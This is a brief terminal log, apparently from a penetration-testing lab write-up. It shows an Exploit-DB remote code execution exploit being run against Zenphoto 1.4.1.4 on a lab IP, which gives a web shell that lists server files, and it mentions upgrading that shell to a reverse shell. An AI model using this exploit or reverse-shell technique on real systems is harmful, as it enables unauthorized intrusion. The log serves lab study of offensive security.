Copy ╭─ /home/kali/ZenPhoto ▓▒░────────────────────────────────────────────░▒▓ INT ✘ 10m 48s root@kali
╰─ php /usr/share/exploitdb/exploits/php/webapps/18083.php 192.168.135.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# ls
class.auth.php
class.file.php
class.history.php
class.image.php
class.manager.php
class.pagination.php
class.search.php
class.session.php
class.sessionaction.php
class.upload.php
config.base.php
config.php
config.tinymce.php
data.php
function.base.php
zenphoto-shell# ls /tmp
The exploit had a pretty annoying shell so I had to upgrade it using a my own shell.sh and changing its permissions and then catch a reverse shell in another listener.